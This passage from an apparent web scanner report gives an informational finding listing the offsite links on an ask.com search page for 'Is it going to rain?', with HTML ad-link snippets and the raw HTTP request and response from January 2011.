<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=C03N8pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqtx7fvkjq-FPUXetrx0rBHLCTXekSA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=C03N8pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUN64i676_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqtx7fvkjq-FPUXetrx0rBHLCTXekSA&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D2151%2526N%253D2151%2526cname%253DMaintenance%2526sitelinks%253Dwinterizing')" onmouseout="cs()" style="">Winterizing</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=Cj5VipshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtxc61gShCpVjAqxz9VqeZ9M5wOUhQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=Cj5VipshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUNCLsoUCYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtxc61gShCpVjAqxz9VqeZ9M5wOUhQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2075%2526cname%253DBoat-Seats%2526sitelinks%253Dboatseats')" onmouseout="cs()" style="">Shop Boat Seats</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CygR9pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtyRJ8QfhDv5_bWQ-EfPU6s60-F5AQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CygR9pshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUP_fwIgEYMmGgICkJKABudK__wPIAQGqBB5P0DcTM9fSgLYuHbWfaf7NQaDmxiBuOecfCOTxPG8&num=4&ctype=4&sig=AGiWqtyRJ8QfhDv5_bWQ-EfPU6s60-F5AQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fwww.overtons.com%252Fboatcovertool%252F%253Fsitelinks%253Dboatcovertool')" onmouseout="cs()" style="">Boat Cover Selection Tool</a>
...[SNIP]...
<div><a class="txt3 title nu" href="http://www.google.com/aclk?sa=l&ai=CvI3VpshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqty8pQ7Y8Lj6tCO7EnzMk1Y_6BqUwQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(26); if (typeof efclk != 'undefined') efclk(26); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_3');" class="nu" onmouseover="return ss('http://www.google.com/aclk?sa=l&ai=CvI3VpshBTfXnGIHRggeI_52iD9vO8tsBi8y6yxe9rLMHEAQg-_6BAygFUIzAuNf8_____wFgyYaAgKQkoAG50r__A8gBAaoEHk_QNxMz19KAti4dtZ9p_s1BoObGIG455x8I5PE8bw&num=4&ctype=4&sig=AGiWqty8pQ7Y8Lj6tCO7EnzMk1Y_6BqUwQ&adurl=http://www.rkdms.com/redirect%3Fc%3D177504256%26en%3D1%26cl%3D229%26u%3Dhttp%253A%252F%252Fsearch.overtons.com%252F%253FNe%253D1000%2526N%253D2086%2526cname%253DPontoon-Boat-Furniture-Accessories%2526sitelinks%253Dpontoonfurniture')" onmouseout="cs()" style="">Shop Pontoon Furniture</a>
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CoKhbpshBTfXnGIHRggeI_52iD4r8pMUBor7AiBLmnfAEEAUg-_6BAygFUNv0seIEYMmGgICkJMgBAaoEG0_QFw8w19OAti4d_Z_3kV77mBbMz8jcNapfKA&num=5&sig=AGiWqtxMUb81cAfa3sGbosfNazzLWyplZA&adurl=http://www.boatcourse.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(24); if (typeof efclk != 'undefined') efclk(24); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_4');" class="nu" onmouseover="return ss('www.<b>boat</b>course.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_4" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CoKhbpshBTfXnGIHRggeI_52iD4r8pMUBor7AiBLmnfAEEAUg-_6BAygFUNv0seIEYMmGgICkJMgBAaoEG0_QFw8w19OAti4d_Z_3kV77mBbMz8jcNapfKA&num=5&sig=AGiWqtxMUb81cAfa3sGbosfNazzLWyplZA&adurl=http://www.boatcourse.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(24); if (typeof efclk != 'undefined') efclk(24); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'4',b:'spl',tp:'bot',ec:'5',ex:'sgcl%3D004bdk-2rc%26sgch%3Dbce6sNUuW'},'gg_4');" class="nu" onmouseover="return ss('www.<b>boat</b>course.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" onmousedown="return ct(this,5015)" class="txt2 info l_nu" target="_top">
Careers</a>
...[SNIP]...

<a href="http://asksupport.custhelp.com/app/answers/list" onmousedown="return ct(this,54387)" class="txt2 info l_nu" target="_blank">
Help</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-275393088?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

12.27. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The page was loaded from a URL containing a query string:

http://www.ask.com/web?q=Is+it+going+to+rain%3F&qsrc=3195

The response contains the following links to other domains:

http://4.afs.googleadservices.com/images/partners/CPzHtOmS26YCFcbe4AodjRrq9g/aj-cat.png
http://answers.yahoo.com/question/index?qid=20081004154711AAi5aHz
http://api.recaptcha.net/js/recaptcha_ajax.js
http://ask.pronto.com/user/search.do?&q=Is+it+going+to+rain%3F
http://ask.weather.com/outlook/local/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-cc
http://ask.weather.com/weather/hourbyhour/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-hbh
http://ask.weather.com/weather/map/interactive/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=iRadar
http://ask.weather.com/weather/tenday/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-tenday
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=serpy918;cat=ask_s255;u1=0A4EDD4111C033B329ACD8C41BD460F3;u4=;u3=;u2=0;ord=-1443630502?
http://goingtorain.com/
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://isitgoingtoraintoday.com/
http://www.askkids.com/?o=0&l=dir
http://www.associatedcontent.com/article/5524366/is_it_going_to_rain.html
http://www.google.com/aclk?sa=L&ai=CJtAKF8tBTbzgFca9gweNtai3D_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9CrcA26stmcWrFGCKLadRcWqGcHgDf_UHquPQCoigVS&num=4&sig=AGiWqty3ntGtdYYy1GWP0M2-J2Fz9s3jKA&adurl=http://www.nowaktours.com
http://www.google.com/aclk?sa=L&ai=CKfimF8tBTbzgFca9gweNtai3D87C3ha27Z_cAtj15wwQBSD7_oEDKAVQz-u07gNgyYajh9SjgBDIAQGqBBtP0MtMMrqz2ZxasUYIost03Zm6HhplrcNVFXo&num=5&sig=AGiWqtzLagMVN4rw1cRVmOqPmESbZeysOA&adurl=http://www.cinderellatravel.com/visas_kazakhstan.php
http://www.google.com/aclk?sa=L&ai=Cqt1bF8tBTbzgFca9gweNtai3D6jnhcUB2K646xjY9ecMEAIg-_6BAygFUKSdoZ0BYMmGo4fUo4AQyAEBqQLZQvU5Sd6wPqoEHk_QuwtmurTZnFqxDgh9ppfqV1xJyWZgLFO3QTuikw&num=2&sig=AGiWqtzaqlkpDOQFi4s1FtegTgBeyHM8hw&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809208%26247subproduct%3DSEARCH
http://www.google.com/aclk?sa=l&ai=C2JlWF8tBTbzgFca9gweNtai3D_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QyxAmurfZnFqxDgg0-I3-V1xJyWZgLFO3QTuikw&num=1&sig=AGiWqtw0Zcro-S-hVohA221ltAjbHd9Pjw&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541
http://www.google.com/aclk?sa=l&ai=C60WVF8tBTbzgFca9gweNtai3D_qnusUBkueapxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_QqzQhurXZnFqxRgii2nUoZsR0B4A3_1B6rj0AqIoFUg&num=3&sig=AGiWqtya-9GQ-X3QZy32kNIPC6VOYjGL9A&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC
http://www.lyricsmode.com/lyrics/k/katie_melua/i_think_its_going_to_rain_today.html
http://www.lyricsmode.com/lyrics/u/ub40/i_think_its_going_to_rain_today.html
http://www.raintoday.co.uk/
http://www.ultimate-guitar.com/tabs/k/katie_melua/i_think_its_going_to_rain_today_crd.htm

Request

GET /web?q=Is+it+going+to+rain%3F&qsrc=3195 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: gcc=RW50ZXJ0YWlubWVudC9UVi9UVl9OZXR3b3Jrcw..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:23 GMT; Path=/
Set-Cookie: clc=RW50ZXJ0YWlubWVudC9UVi9UVl9OZXR3b3Jrcw..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:44:23 GMT; Path=/
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:44:23 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.|SXMraXQrZ29pbmcrdG8rcmFpbiUzRg..; Domain=.ask.com; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjIzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:23 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:23 GMT; Path=/
Set-Cookie: qc=1; Domain=.ask.com; Path=/
Content-Length: 142538

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

<title>Ask.com - Wha
...[SNIP]...
<li><a href="http://ask.pronto.com/user/search.do?&q=Is+it+going+to+rain%3F"
class="txt3 b" style="">Shopping</a>
...[SNIP]...
<li>
<a href="http://www.askkids.com?o=0&l=dir"
class="txt3 b" style="">Kids</a>
...[SNIP]...
<td colspan="4" style="padding-bottom:6px">

<a class="txt_lg title" href="http://ask.weather.com/outlook/local/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-cc" onmousedown="pk(this,{en:'da',io:'0',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Foutlook%2Flocal%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3Dwx-cc'})">
<span>
...[SNIP]...
<span style="white-space:nowrap">

<a class="txt3 title" href="http://ask.weather.com/weather/hourbyhour/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-hbh" onmousedown="pk(this,{en:'da',io:'2',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Fweather%2Fhourbyhour%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3Dwx-hbh'})">Hour by Hour</a>
...[SNIP]...
<span style="white-space:nowrap">

<a class="txt3 title" href="http://ask.weather.com/weather/tenday/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=wx-tenday" onmousedown="pk(this,{en:'da',io:'3',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Fweather%2Ftenday%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3Dwx-tenday'})">10 Day Forecast</a>
...[SNIP]...
<span style="white-space:nowrap">

<a class="txt3 title" href="http://ask.weather.com/weather/map/interactive/75201?par=iac&site=www.ask.com&promo=0&cm_ven=IAC&cm_cat=www.ask.com&cm_pla=smartanswers-us&cm_ite=iRadar" onmousedown="pk(this,{en:'da',io:'4',b:'a001',tp:'51',ec:'4',url:'http%3A%2F%2Fask.weather.com%2Fweather%2Fmap%2Finteractive%2F75201%3Fpar%3Diac%26site%3Dwww.ask.com%26promo%3D0%26cm_ven%3DIAC%26cm_cat%3Dwww.ask.com%26cm_pla%3Dsmartanswers-us%26cm_ite%3DiRadar'})">Interactive Radar Map</a>
...[SNIP]...

<img src="http://4.afs.googleadservices.com/images/partners/CPzHtOmS26YCFcbe4AodjRrq9g/aj-cat.png" style="display:none;" height="1px" width="1px" alt=""/>

<span class="T7 fr tp info txt0">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C2JlWF8tBTbzgFca9gweNtai3D_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QyxAmurfZnFqxDgg0-I3-V1xJyWZgLFO3QTuikw&num=1&sig=AGiWqtw0Zcro-S-hVohA221ltAjbHd9Pjw&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_0" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C2JlWF8tBTbzgFca9gweNtai3D_-UtNgB19PHzhXaiekEEAEg-_6BAygFUJDfusgHYMmGo4fUo4AQoAHRxuDzA8gBAaoEHk_QyxAmurfZnFqxDgg0-I3-V1xJyWZgLFO3QTuikw&num=1&sig=AGiWqtw0Zcro-S-hVohA221ltAjbHd9Pjw&adurl=http://track.searchignite.com/si/cm/tracking/clickredirect.aspx%3Fsicontent%3D0%26sicreative%3D5712315807%26sitrackingid%3D157750541" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(35); if (typeof efclk != 'undefined') efclk(35); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'0',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_0');" class="nu" onmouseover="return ss('instantweatherforecast.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=Cqt1bF8tBTbzgFca9gweNtai3D6jnhcUB2K646xjY9ecMEAIg-_6BAygFUKSdoZ0BYMmGo4fUo4AQyAEBqQLZQvU5Sd6wPqoEHk_QuwtmurTZnFqxDgh9ppfqV1xJyWZgLFO3QTuikw&num=2&sig=AGiWqtzaqlkpDOQFi4s1FtegTgBeyHM8hw&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809208%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(54); if (typeof efclk != 'undefined') efclk(54); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_1" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=Cqt1bF8tBTbzgFca9gweNtai3D6jnhcUB2K646xjY9ecMEAIg-_6BAygFUKSdoZ0BYMmGo4fUo4AQyAEBqQLZQvU5Sd6wPqoEHk_QuwtmurTZnFqxDgh9ppfqV1xJyWZgLFO3QTuikw&num=2&sig=AGiWqtzaqlkpDOQFi4s1FtegTgBeyHM8hw&adurl=http://na.link.decdna.net/n/63605/103595/www.ontariotravel.net/1htg5j9%3B11%3B4%3B%3B8%3B7l30%3Bamv080%3Bgj97x%3B%3Bgvzap%3Bcak%3B1%3B/i/c%3F0%26pq%3D%252fTCISSegmentsWeb%252fmain%252eportal%253fsetlanguage%253dEN%26247cr%3D6573809208%26247subproduct%3DSEARCH" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(54); if (typeof efclk != 'undefined') efclk(54); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'1',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_1');" class="nu" onmouseover="return ss('ontariotravel.net')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=l&ai=C60WVF8tBTbzgFca9gweNtai3D_qnusUBkueapxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_QqzQhurXZnFqxRgii2nUoZsR0B4A3_1B6rj0AqIoFUg&num=3&sig=AGiWqtya-9GQ-X3QZy32kNIPC6VOYjGL9A&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(65); if (typeof efclk != 'undefined') efclk(65); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_2" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=l&ai=C60WVF8tBTbzgFca9gweNtai3D_qnusUBkueapxWuyOkEEAMg-_6BAygFUKGOuKkDYMmGo4fUo4AQoAGlvYb_A8gBAaoEIU_QqzQhurXZnFqxRgii2nUoZsR0B4A3_1B6rj0AqIoFUg&num=3&sig=AGiWqtya-9GQ-X3QZy32kNIPC6VOYjGL9A&adurl=http://www.local.com/results.aspx%3Fkeyword%3Dweather%26cid%3D1265%26location%3DWashington%2BDC" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(65); if (typeof efclk != 'undefined') efclk(65); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'2',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_2');" class="nu" onmouseover="return ss('local.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...

<a href="http://www.google.com/aclk?sa=L&ai=CJtAKF8tBTbzgFca9gweNtai3D_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9CrcA26stmcWrFGCKLadRcWqGcHgDf_UHquPQCoigVS&num=4&sig=AGiWqty3ntGtdYYy1GWP0M2-J2Fz9s3jKA&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(15); if (typeof efclk != 'undefined') efclk(15); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style="">
<span class="txt_lg title" id="gg_3" st_id='1'>
...[SNIP]...
<br />
<a href="http://www.google.com/aclk?sa=L&ai=CJtAKF8tBTbzgFca9gweNtai3D_e89qEBgfyUgw60x-IEEAQg-_6BAygFUNChosQHYMmGo4fUo4AQyAEBqgQhT9CrcA26stmcWrFGCKLadRcWqGcHgDf_UHquPQCoigVS&num=4&sig=AGiWqty3ntGtdYYy1GWP0M2-J2Fz9s3jKA&adurl=http://www.nowaktours.com" rel="nofollow" target="_blank" onMouseDown="if (typeof cstmclk != 'undefined') cstmclk(15); if (typeof efclk != 'undefined') efclk(15); if (JASK.pixel.dartpick) JASK.pixel.dartpick(); return pk(this,{en:'gg',io:'3',b:'spl',tp:'top',ec:'4',ex:'sgcl%3Dfef9Sl-%252BcC%26sgch%3D26d8GfiNd'},'gg_3');" class="nu" onmouseover="return ss('www.nowaktours.com')" onmouseout="cs()" style=""><span class="attrib">
...[SNIP]...
<div id="r_t1"><a onmousedown="return pk(this,{en:'afd',io:'0',b:'a002',tp:'d',ec:'1'})" href="http://www.associatedcontent.com/article/5524366/is_it_going_to_rain.html" class="title txt_lg" ><b>
...[SNIP]...
<div id="r_t2"><a onmousedown="return pk(this,{en:'af',io:'0',b:'a003',tp:'d',ec:'1'})" href="http://answers.yahoo.com/question/index?qid=20081004154711AAi5aHz" class="title txt_lg" ><b>
...[SNIP]...
<td>

<a id="r4_t" href="http://goingtorain.com/"
onmousedown="return fp(this,{en:'te',io:'0',b:'a005',tp:'d',ec:'1',ex:'tsrc%3Dvnru'},'false',0)" class="title txt_lg" target="_blank" ><b>
...[SNIP]...
<td>

<a id="r5_t" href="http://isitgoingtoraintoday.com/"
